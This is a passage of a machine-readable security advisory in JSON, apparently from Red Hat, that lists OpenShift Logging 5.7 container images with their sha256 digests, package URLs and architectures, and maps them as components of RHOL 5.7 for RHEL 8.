"purl": "pkg:oci/elasticsearch-operator-bundle@sha256:e7473220ed7c90e9828fa9f20ca7b5365abcceec9e0deb23ccd7fb1d59557457?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch-operator-bundle\u0026tag=v5.7.13-19"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:ec87f5708c1726a86cd075f1eb0c7c8f272e18311e898481282f29bb63189d26_amd64",
"product": {
"name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:ec87f5708c1726a86cd075f1eb0c7c8f272e18311e898481282f29bb63189d26_amd64",
"product_id": "openshift-logging/elasticsearch-proxy-rhel8@sha256:ec87f5708c1726a86cd075f1eb0c7c8f272e18311e898481282f29bb63189d26_amd64",
"product_identification_helper": {
"purl": "pkg:oci/elasticsearch-proxy-rhel8@sha256:ec87f5708c1726a86cd075f1eb0c7c8f272e18311e898481282f29bb63189d26?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch-proxy-rhel8\u0026tag=v1.0.0-480"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/log-file-metric-exporter-rhel8@sha256:2800d2b1420d2db70ebcad5f9877d4269091a5a1aee6f411533ff21a6dc91877_amd64",
"product": {
"name": "openshift-logging/log-file-metric-exporter-rhel8@sha256:2800d2b1420d2db70ebcad5f9877d4269091a5a1aee6f411533ff21a6dc91877_amd64",
"product_id": "openshift-logging/log-file-metric-exporter-rhel8@sha256:2800d2b1420d2db70ebcad5f9877d4269091a5a1aee6f411533ff21a6dc91877_amd64",
"product_identification_helper": {
"purl": "pkg:oci/log-file-metric-exporter-rhel8@sha256:2800d2b1420d2db70ebcad5f9877d4269091a5a1aee6f411533ff21a6dc91877?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/log-file-metric-exporter-rhel8\u0026tag=v1.1.0-228"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/logging-curator5-rhel8@sha256:065a934e612868128f21b676e653e697b62aa1f684feb8c91f42681c1dc69dd9_amd64",
"product": {
"name": "openshift-logging/logging-curator5-rhel8@sha256:065a934e612868128f21b676e653e697b62aa1f684feb8c91f42681c1dc69dd9_amd64",
"product_id": "openshift-logging/logging-curator5-rhel8@sha256:065a934e612868128f21b676e653e697b62aa1f684feb8c91f42681c1dc69dd9_amd64",
"product_identification_helper": {
"purl": "pkg:oci/logging-curator5-rhel8@sha256:065a934e612868128f21b676e653e697b62aa1f684feb8c91f42681c1dc69dd9?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/logging-curator5-rhel8\u0026tag=v5.8.1-471"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/elasticsearch6-rhel8@sha256:0c04dbc3a45a08de0f6e53605c8e9db1fae051053dc524a70bf6d99746667a60_amd64",
"product": {
"name": "openshift-logging/elasticsearch6-rhel8@sha256:0c04dbc3a45a08de0f6e53605c8e9db1fae051053dc524a70bf6d99746667a60_amd64",
"product_id": "openshift-logging/elasticsearch6-rhel8@sha256:0c04dbc3a45a08de0f6e53605c8e9db1fae051053dc524a70bf6d99746667a60_amd64",
"product_identification_helper": {
"purl": "pkg:oci/elasticsearch6-rhel8@sha256:0c04dbc3a45a08de0f6e53605c8e9db1fae051053dc524a70bf6d99746667a60?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch6-rhel8\u0026tag=v6.8.1-408"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/eventrouter-rhel8@sha256:9ce55848e6d84082724ef735fd373726fdecf0935fc42061358a2704c405a3d5_amd64",
"product": {
"name": "openshift-logging/eventrouter-rhel8@sha256:9ce55848e6d84082724ef735fd373726fdecf0935fc42061358a2704c405a3d5_amd64",
"product_id": "openshift-logging/eventrouter-rhel8@sha256:9ce55848e6d84082724ef735fd373726fdecf0935fc42061358a2704c405a3d5_amd64",
"product_identification_helper": {
"purl": "pkg:oci/eventrouter-rhel8@sha256:9ce55848e6d84082724ef735fd373726fdecf0935fc42061358a2704c405a3d5?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/eventrouter-rhel8\u0026tag=v0.4.0-248"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/fluentd-rhel8@sha256:25a5133ec301b3334446ccd2205d20209aaf246544b5c11d01f6b1b8885da046_amd64",
"product": {
"name": "openshift-logging/fluentd-rhel8@sha256:25a5133ec301b3334446ccd2205d20209aaf246544b5c11d01f6b1b8885da046_amd64",
"product_id": "openshift-logging/fluentd-rhel8@sha256:25a5133ec301b3334446ccd2205d20209aaf246544b5c11d01f6b1b8885da046_amd64",
"product_identification_helper": {
"purl": "pkg:oci/fluentd-rhel8@sha256:25a5133ec301b3334446ccd2205d20209aaf246544b5c11d01f6b1b8885da046?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/fluentd-rhel8\u0026tag=v1.14.6-215"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/kibana6-rhel8@sha256:bb7addc37488f89ac93564dea9d76e3778eaa421206db72236d8aeb56195878a_amd64",
"product": {
"name": "openshift-logging/kibana6-rhel8@sha256:bb7addc37488f89ac93564dea9d76e3778eaa421206db72236d8aeb56195878a_amd64",
"product_id": "openshift-logging/kibana6-rhel8@sha256:bb7addc37488f89ac93564dea9d76e3778eaa421206db72236d8aeb56195878a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kibana6-rhel8@sha256:bb7addc37488f89ac93564dea9d76e3778eaa421206db72236d8aeb56195878a?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/kibana6-rhel8\u0026tag=v6.8.1-431"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/logging-loki-rhel8@sha256:4410e01bf80e2edf9e4ea0506bd23a0de143941c8338565edb0ffa04367993ce_amd64",
"product": {
"name": "openshift-logging/logging-loki-rhel8@sha256:4410e01bf80e2edf9e4ea0506bd23a0de143941c8338565edb0ffa04367993ce_amd64",
"product_id": "openshift-logging/logging-loki-rhel8@sha256:4410e01bf80e2edf9e4ea0506bd23a0de143941c8338565edb0ffa04367993ce_amd64",
"product_identification_helper": {
"purl": "pkg:oci/logging-loki-rhel8@sha256:4410e01bf80e2edf9e4ea0506bd23a0de143941c8338565edb0ffa04367993ce?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/logging-loki-rhel8\u0026tag=v2.9.6-15"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/vector-rhel8@sha256:caa92026abefc9d8fdd0b922b615906556e1d40e94ed040d37ae37000227c372_amd64",
"product": {
"name": "openshift-logging/vector-rhel8@sha256:caa92026abefc9d8fdd0b922b615906556e1d40e94ed040d37ae37000227c372_amd64",
"product_id": "openshift-logging/vector-rhel8@sha256:caa92026abefc9d8fdd0b922b615906556e1d40e94ed040d37ae37000227c372_amd64",
"product_identification_helper": {
"purl": "pkg:oci/vector-rhel8@sha256:caa92026abefc9d8fdd0b922b615906556e1d40e94ed040d37ae37000227c372?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/vector-rhel8\u0026tag=v0.28.1-57"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/logging-view-plugin-rhel8@sha256:5b7f4594f0f3c99f727ba7fe4e5e2d448a793317ccdaa20b065d4338392f20e3_amd64",
"product": {
"name": "openshift-logging/logging-view-plugin-rhel8@sha256:5b7f4594f0f3c99f727ba7fe4e5e2d448a793317ccdaa20b065d4338392f20e3_amd64",
"product_id": "openshift-logging/logging-view-plugin-rhel8@sha256:5b7f4594f0f3c99f727ba7fe4e5e2d448a793317ccdaa20b065d4338392f20e3_amd64",
"product_identification_helper": {
"purl": "pkg:oci/logging-view-plugin-rhel8@sha256:5b7f4594f0f3c99f727ba7fe4e5e2d448a793317ccdaa20b065d4338392f20e3?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/logging-view-plugin-rhel8\u0026tag=v5.7.13-3"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/loki-operator-bundle@sha256:19253d82c2b591ce0571cdb7af1f78ba4f0f26945a0f23cced740e7614041afa_amd64",
"product": {
"name": "openshift-logging/loki-operator-bundle@sha256:19253d82c2b591ce0571cdb7af1f78ba4f0f26945a0f23cced740e7614041afa_amd64",
"product_id": "openshift-logging/loki-operator-bundle@sha256:19253d82c2b591ce0571cdb7af1f78ba4f0f26945a0f23cced740e7614041afa_amd64",
"product_identification_helper": {
"purl": "pkg:oci/loki-operator-bundle@sha256:19253d82c2b591ce0571cdb7af1f78ba4f0f26945a0f23cced740e7614041afa?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/loki-operator-bundle\u0026tag=v5.7.13-27"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/loki-rhel8-operator@sha256:ba650502eb74b344a1909e6e6157bd643743ce7ceef834f2f04bf5466f59b87b_amd64",
"product": {
"name": "openshift-logging/loki-rhel8-operator@sha256:ba650502eb74b344a1909e6e6157bd643743ce7ceef834f2f04bf5466f59b87b_amd64",
"product_id": "openshift-logging/loki-rhel8-operator@sha256:ba650502eb74b344a1909e6e6157bd643743ce7ceef834f2f04bf5466f59b87b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/loki-rhel8-operator@sha256:ba650502eb74b344a1909e6e6157bd643743ce7ceef834f2f04bf5466f59b87b?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/loki-rhel8-operator\u0026tag=v5.7.13-12"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/lokistack-gateway-rhel8@sha256:4db6a4f74f97b0488c7c496b12ef6a8aa68e772e7f76b2445531b5b6184985f3_amd64",
"product": {
"name": "openshift-logging/lokistack-gateway-rhel8@sha256:4db6a4f74f97b0488c7c496b12ef6a8aa68e772e7f76b2445531b5b6184985f3_amd64",
"product_id": "openshift-logging/lokistack-gateway-rhel8@sha256:4db6a4f74f97b0488c7c496b12ef6a8aa68e772e7f76b2445531b5b6184985f3_amd64",
"product_identification_helper": {
"purl": "pkg:oci/lokistack-gateway-rhel8@sha256:4db6a4f74f97b0488c7c496b12ef6a8aa68e772e7f76b2445531b5b6184985f3?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/lokistack-gateway-rhel8\u0026tag=v0.1.0-527"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/opa-openshift-rhel8@sha256:31040aab576e551099b6a5a3d8f05df20c9f242d539aaa393bfe131f2dd5ece8_amd64",
"product": {
"name": "openshift-logging/opa-openshift-rhel8@sha256:31040aab576e551099b6a5a3d8f05df20c9f242d539aaa393bfe131f2dd5ece8_amd64",
"product_id": "openshift-logging/opa-openshift-rhel8@sha256:31040aab576e551099b6a5a3d8f05df20c9f242d539aaa393bfe131f2dd5ece8_amd64",
"product_identification_helper": {
"purl": "pkg:oci/opa-openshift-rhel8@sha256:31040aab576e551099b6a5a3d8f05df20c9f242d539aaa393bfe131f2dd5ece8?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/opa-openshift-rhel8\u0026tag=v0.1.0-225"
}
}
}
],
"category": "architecture",
"name": "amd64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/cluster-logging-operator-bundle@sha256:5052bba9c7eba5ad23b72f73429ecdbc2de555d9138a2d77ec271297b5030ffd_amd64 as a component of RHOL 5.7 for RHEL 8",
"product_id": "8Base-RHOL-5.7:openshift-logging/cluster-logging-operator-bundle@sha256:5052bba9c7eba5ad23b72f73429ecdbc2de555d9138a2d77ec271297b5030ffd_amd64"
},
"product_reference": "openshift-logging/cluster-logging-operator-bundle@sha256:5052bba9c7eba5ad23b72f73429ecdbc2de555d9138a2d77ec271297b5030ffd_amd64",
"relates_to_product_reference": "8Base-RHOL-5.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/cluster-logging-rhel8-operator@sha256:2c8e5b01f778d0c79cd5dd94476fca3c67f540c234735c9511c5a84fc08aab99_ppc64le as a component of RHOL 5.7 for RHEL 8",
"product_id": "8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:2c8e5b01f778d0c79cd5dd94476fca3c67f540c234735c9511c5a84fc08aab99_ppc64le"
},
"product_reference": "openshift-logging/cluster-logging-rhel8-operator@sha256:2c8e5b01f778d0c79cd5dd94476fca3c67f540c234735c9511c5a84fc08aab99_ppc64le",
"relates_to_product_reference": "8Base-RHOL-5.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/cluster-logging-rhel8-operator@sha256:47f59d32139e8d738e1916321c52842e62f79724334c6af50ce988e283aa0a99_s390x as a component of RHOL 5.7 for RHEL 8",
"product_id": "8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:47f59d32139e8d738e1916321c52842e62f79724334c6af50ce988e283aa0a99_s390x"
},
"product_reference": "openshift-logging/cluster-logging-rhel8-operator@sha256:47f59d32139e8d738e1916321c52842e62f79724334c6af50ce988e283aa0a99_s390x",
"relates_to_product_reference": "8Base-RHOL-5.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/cluster-logging-rhel8-operator@sha256:61c2a4170defd4022aa103f89394cb759fa349e7c146506f4c247e67b3b12c01_amd64 as a component of RHOL 5.7 for RHEL 8",
"product_id": "8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:61c2a4170defd4022aa103f89394cb759fa349e7c146506f4c247e67b3b12c01_amd64"
},
"product_reference": "openshift-logging/cluster-logging-rhel8-operator@sha256:61c2a4170defd4022aa103f89394cb759fa349e7c146506f4c247e67b3b12c01_amd64",
"relates_to_product_reference": "8Base-RHOL-5.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/cluster-logging-rhel8-operator@sha256:e3da1a9825779d34882915353603bca4fb66accdd45aa9acc92ed2fe694071cd_arm64 as a component of RHOL 5.7 for RHEL 8",
"product_id": "8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:e3da1a9825779d34882915353603bca4fb66accdd45aa9acc92ed2fe694071cd_arm64"
},
"product_reference": "openshift-logging/cluster-logging-rhel8-operator@sha256:e3da1a9825779d34882915353603bca4fb66accdd45aa9acc92ed2fe694071cd_arm64",
"relates_to_product_reference": "8Base-RHOL-5.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/elasticsearch-operator-bundle@sha256:e7473220ed7c90e9828fa9f20ca7b5365abcceec9e0deb23ccd7fb1d59557457_amd64 as a component of RHOL 5.7 for RHEL 8",
"product_id": "8Base-RHOL-5.7:openshift-logging/elasticsearch-operator-bundle@sha256:e7473220ed7c90e9828fa9f20ca7b5365abcceec9e0deb23ccd7fb1d59557457_amd64"
},
"product_reference": "openshift-logging/elasticsearch-operator-bundle@sha256:e7473220ed7c90e9828fa9f20ca7b5365abcceec9e0deb23ccd7fb1d59557457_amd64",
"relates_to_product_reference": "8Base-RHOL-5.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:16774c5a92ee7c8a5c841badba97b346cc1bdfb34b776331177ccea7d1967b5e_s390x as a component of RHOL 5.7 for RHEL 8",
"product_id": "8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:16774c5a92ee7c8a5c841badba97b346cc1bdfb34b776331177ccea7d1967b5e_s390x"
},
"product_reference": "openshift-logging/elasticsearch-proxy-rhel8@sha256:16774c5a92ee7c8a5c841badba97b346cc1bdfb34b776331177ccea7d1967b5e_s390x",
"relates_to_product_reference": "8Base-RHOL-5.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:25f30f718ad1ff34d4658aa14c86eaac26f973d42d736f65fa68ab23d2256439_ppc64le as a component of RHOL 5.7 for RHEL 8",
"product_id": "8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:25f30f718ad1ff34d4658aa14c86eaac26f973d42d736f65fa68ab23d2256439_ppc64le"
},
"product_reference": "openshift-logging/elasticsearch-proxy-rhel8@sha256:25f30f718ad1ff34d4658aa14c86eaac26f973d42d736f65fa68ab23d2256439_ppc64le",
"relates_to_product_reference": "8Base-RHOL-5.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:cfbaf603982debbd682ef4a5d5e2b8309c43e6db519699e793f55f4433d13327_arm64 as a component of RHOL 5.7 for RHEL 8",
"product_id": "8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:cfbaf603982debbd682ef4a5d5e2b8309c43e6db519699e793f55f4433d13327_arm64"
},
"product_reference": "openshift-logging/elasticsearch-proxy-rhel8@sha256:cfbaf603982debbd682ef4a5d5e2b8309c43e6db519699e793f55f4433d13327_arm64",
"relates_to_product_reference": "8Base-RHOL-5.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:ec87f5708c1726a86cd075f1eb0c7c8f272e18311e898481282f29bb63189d26_amd64 as a component of RHOL 5.7 for RHEL 8",
"product_id": "8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:ec87f5708c1726a86cd075f1eb0c7c8f272e18311e898481282f29bb63189d26_amd64"
},
"product_reference": "openshift-logging/elasticsearch-proxy-rhel8@sha256:ec87f5708c1726a86cd075f1eb0c7c8f272e18311e898481282f29bb63189d26_amd64",
"relates_to_product_reference": "8Base-RHOL-5.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/elasticsearch-rhel8-operator@sha256:2ec1ae08dd2f29a777d71003ae0d2a69eb56ad6e10742706ac35784faf45c08d_arm64 as a component of RHOL 5.7 for RHEL 8",
"product_id": "8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:2ec1ae08dd2f29a777d71003ae0d2a69eb56ad6e10742706ac35784faf45c08d_arm64"
},
"product_reference": "openshift-logging/elasticsearch-rhel8-operator@sha256:2ec1ae08dd2f29a777d71003ae0d2a69eb56ad6e10742706ac35784faf45c08d_arm64",
"relates_to_product_reference": "8Base-RHOL-5.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/elasticsearch-rhel8-operator@sha256:9c4d1c2beb0248c2f518e1e936298bfb9c9a22f87e2cbacd501cdaef675850e2_ppc64le as a component of RHOL 5.7 for RHEL 8",
"product_id": "8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:9c4d1c2beb0248c2f518e1e936298bfb9c9a22f87e2cbacd501cdaef675850e2_ppc64le"
},
"product_reference": "openshift-logging/elasticsearch-rhel8-operator@sha256:9c4d1c2beb0248c2f518e1e936298bfb9c9a22f87e2cbacd501cdaef675850e2_ppc64le",
"relates_to_product_reference": "8Base-RHOL-5.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/elasticsearch-rhel8-operator@sha256:b884874a18a66126d49de1d0c253247b87371dc027f1d96b5615fbeb0adaa7b5_amd64 as a component of RHOL 5.7 for RHEL 8",
"product_id": "8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:b884874a18a66126d49de1d0c253247b87371dc027f1d96b5615fbeb0adaa7b5_amd64"
},
"product_reference": "openshift-logging/elasticsearch-rhel8-operator@sha256:b884874a18a66126d49de1d0c253247b87371dc027f1d96b5615fbeb0adaa7b5_amd64",
"relates_to_product_reference": "8Base-RHOL-5.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/elasticsearch-rhel8-operator@sha256:c3f5921db6798608847173f2c6049f7a6bec470ead8aea936c13fb5348e6192a_s390x as a component of RHOL 5.7 for RHEL 8",
"product_id": "8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:c3f5921db6798608847173f2c6049f7a6bec470ead8aea936c13fb5348e6192a_s390x"
},
"product_reference": "openshift-logging/elasticsearch-rhel8-operator@sha256:c3f5921db6798608847173f2c6049f7a6bec470ead8aea936c13fb5348e6192a_s390x",
"relates_to_product_reference": "8Base-RHOL-5.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/elasticsearch6-rhel8@sha256:0c04dbc3a45a08de0f6e53605c8e9db1fae051053dc524a70bf6d99746667a60_amd64 as a component of RHOL 5.7 for RHEL 8",
"product_id": "8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:0c04dbc3a45a08de0f6e53605c8e9db1fae051053dc524a70bf6d99746667a60_amd64"
},
"product_reference": "openshift-logging/elasticsearch6-rhel8@sha256:0c04dbc3a45a08de0f6e53605c8e9db1fae051053dc524a70bf6d99746667a60_amd64",
"relates_to_product_reference": "8Base-RHOL-5.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/elasticsearch6-rhel8@sha256:44989bd7b7fe369ff2f3ba62b5db4d264b0a86d8cfccd96b720d74d50e9a4910_arm64 as a component of RHOL 5.7 for RHEL 8",
"product_id": "8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:44989bd7b7fe369ff2f3ba62b5db4d264b0a86d8cfccd96b720d74d50e9a4910_arm64"
},
"product_reference": "openshift-logging/elasticsearch6-rhel8@sha256:44989bd7b7fe369ff2f3ba62b5db4d264b0a86d8cfccd96b720d74d50e9a4910_arm64",
"relates_to_product_reference": "8Base-RHOL-5.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/elasticsearch6-rhel8@sha256:68453af0ac957b708b8972162a4e5382f2ec30fa6de79caf013ee876c2008654_ppc64le as a component of RHOL 5.7 for RHEL 8",
"product_id": "8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:68453af0ac957b708b8972162a4e5382f2ec30fa6de79caf013ee876c2008654_ppc64le"
},
"product_reference": "openshift-logging/elasticsearch6-rhel8@sha256:68453af0ac957b708b8972162a4e5382f2ec30fa6de79caf013ee876c2008654_ppc64le",
"relates_to_product_reference": "8Base-RHOL-5.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/elasticsearch6-rhel8@sha256:add0ccfb34e3f0798db0f544bdbc080706611b506eaa24fe8b39a369fba1af7c_s390x as a component of RHOL 5.7 for RHEL 8",
"product_id": "8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:add0ccfb34e3f0798db0f544bdbc080706611b506eaa24fe8b39a369fba1af7c_s390x"
},
"product_reference": "openshift-logging/elasticsearch6-rhel8@sha256:add0ccfb34e3f0798db0f544bdbc080706611b506eaa24fe8b39a369fba1af7c_s390x",
"relates_to_product_reference": "8Base-RHOL-5.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/eventrouter-rhel8@sha256:33b90ea96d93fcc73e740227aa755d85e18566654668f89928572126d80535fe_ppc64le as a component of RHOL 5.7 for RHEL 8",
"product_id": "8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:33b90ea96d93fcc73e740227aa755d85e18566654668f89928572126d80535fe_ppc64le"
},
"product_reference": "openshift-logging/eventrouter-rhel8@sha256:33b90ea96d93fcc73e740227aa755d85e18566654668f89928572126d80535fe_ppc64le",
"relates_to_product_reference": "8Base-RHOL-5.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/eventrouter-rhel8@sha256:7668e3265f4372a0d45342948ce1630e73cd88318e7fce7d720a685a3b240ece_s390x as a component of RHOL 5.7 for RHEL 8",
"product_id": "8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:7668e3265f4372a0d45342948ce1630e73cd88318e7fce7d720a685a3b240ece_s390x"
},
"product_reference": "openshift-logging/eventrouter-rhel8@sha256:7668e3265f4372a0d45342948ce1630e73cd88318e7fce7d720a685a3b240ece_s390x",
"relates_to_product_reference": "8Base-RHOL-5.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/eventrouter-rhel8@sha256:9ce55848e6d84082724ef735fd373726fdecf0935fc42061358a2704c405a3d5_amd64 as a component of RHOL 5.7 for RHEL 8",
"product_id": "8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9ce55848e6d84082724ef735fd373726fdecf0935fc42061358a2704c405a3d5_amd64"
},
"product_reference": "openshift-logging/eventrouter-rhel8@sha256:9ce55848e6d84082724ef735fd373726fdecf0935fc42061358a2704c405a3d5_amd64",
"relates_to_product_reference": "8Base-RHOL-5.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/eventrouter-rhel8@sha256:9f4432fa50935c4d18ae0b9a4da00bf82336347700d1a09643d6597247e1f2f9_arm64 as a component of RHOL 5.7 for RHEL 8",
"product_id": "8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9f4432fa50935c4d18ae0b9a4da00bf82336347700d1a09643d6597247e1f2f9_arm64"
},
"product_reference": "openshift-logging/eventrouter-rhel8@sha256:9f4432fa50935c4d18ae0b9a4da00bf82336347700d1a09643d6597247e1f2f9_arm64",
"relates_to_product_reference": "8Base-RHOL-5.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/fluentd-rhel8@sha256:25a5133ec301b3334446ccd2205d20209aaf246544b5c11d01f6b1b8885da046_amd64 as a component of RHOL 5.7 for RHEL 8",
"product_id": "8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:25a5133ec301b3334446ccd2205d20209aaf246544b5c11d01f6b1b8885da046_amd64"
},
"product_reference": "openshift-logging/fluentd-rhel8@sha256:25a5133ec301b3334446ccd2205d20209aaf246544b5c11d01f6b1b8885da046_amd64",
"relates_to_product_reference": "8Base-RHOL-5.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/fluentd-rhel8@sha256:2a441a5b9d9ca81a769af0bf89245f437f3156b654ed25afa885960567166b9d_s390x as a component of RHOL 5.7 for RHEL 8",
"product_id": "8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:2a441a5b9d9ca81a769af0bf89245f437f3156b654ed25afa885960567166b9d_s390x"
},
"product_reference": "openshift-logging/fluentd-rhel8@sha256:2a441a5b9d9ca81a769af0bf89245f437f3156b654ed25afa885960567166b9d_s390x",
"relates_to_product_reference": "8Base-RHOL-5.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/fluentd-rhel8@sha256:451c1497aa3e26d72a165923d36bbbec4a1ba6536f6ca1fab227467aae21bab6_arm64 as a component of RHOL 5.7 for RHEL 8",
"product_id": "8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:451c1497aa3e26d72a165923d36bbbec4a1ba6536f6ca1fab227467aae21bab6_arm64"
},
"product_reference": "openshift-logging/fluentd-rhel8@sha256:451c1497aa3e26d72a165923d36bbbec4a1ba6536f6ca1fab227467aae21bab6_arm64",
"relates_to_product_reference": "8Base-RHOL-5.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/fluentd-rhel8@sha256:f1b69daf30586538e51e61165ddb5c91d51524d6a020a6392955b726bfc9b1e4_ppc64le as a component of RHOL 5.7 for RHEL 8",
"product_id": "8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:f1b69daf30586538e51e61165ddb5c91d51524d6a020a6392955b726bfc9b1e4_ppc64le"
},
"product_reference": "openshift-logging/fluentd-rhel8@sha256:f1b69daf30586538e51e61165ddb5c91d51524d6a020a6392955b726bfc9b1e4_ppc64le",
"relates_to_product_reference": "8Base-RHOL-5.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/kibana6-rhel8@sha256:3cfae28317e8fa0d73f66626827aa16e8b98b9e8961007b3aa1d4fa30ab663e6_s390x as a component of RHOL 5.7 for RHEL 8",
"product_id": "8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:3cfae28317e8fa0d73f66626827aa16e8b98b9e8961007b3aa1d4fa30ab663e6_s390x"
},
"product_reference": "openshift-logging/kibana6-rhel8@sha256:3cfae28317e8fa0d73f66626827aa16e8b98b9e8961007b3aa1d4fa30ab663e6_s390x",
"relates_to_product_reference": "8Base-RHOL-5.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/kibana6-rhel8@sha256:80fc28564f2bb7d5324997722497a5a64db13b9a92c93e632323168b9ef12afc_arm64 as a component of RHOL 5.7 for RHEL 8",
"product_id": "8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:80fc28564f2bb7d5324997722497a5a64db13b9a92c93e632323168b9ef12afc_arm64"
},
"product_reference": "openshift-logging/kibana6-rhel8@sha256:80fc28564f2bb7d5324997722497a5a64db13b9a92c93e632323168b9ef12afc_arm64",
"relates_to_product_reference": "8Base-RHOL-5.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/kibana6-rhel8@sha256:bb7addc37488f89ac93564dea9d76e3778eaa421206db72236d8aeb56195878a_amd64 as a component of RHOL 5.7 for RHEL 8",
"product_id": "8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:bb7addc37488f89ac93564dea9d76e3778eaa421206db72236d8aeb56195878a_amd64"
},
"product_reference": "openshift-logging/kibana6-rhel8@sha256:bb7addc37488f89ac93564dea9d76e3778eaa421206db72236d8aeb56195878a_amd64",
"relates_to_product_reference": "8Base-RHOL-5.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/kibana6-rhel8@sha256:c32a3c2d6c7246e73ebd17e4536b35dea61e4f2c91fda9d2ff704db83144233e_ppc64le as a component of RHOL 5.7 for RHEL 8",
"product_id": "8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:c32a3c2d6c7246e73ebd17e4536b35dea61e4f2c91fda9d2ff704db83144233e_ppc64le"
},
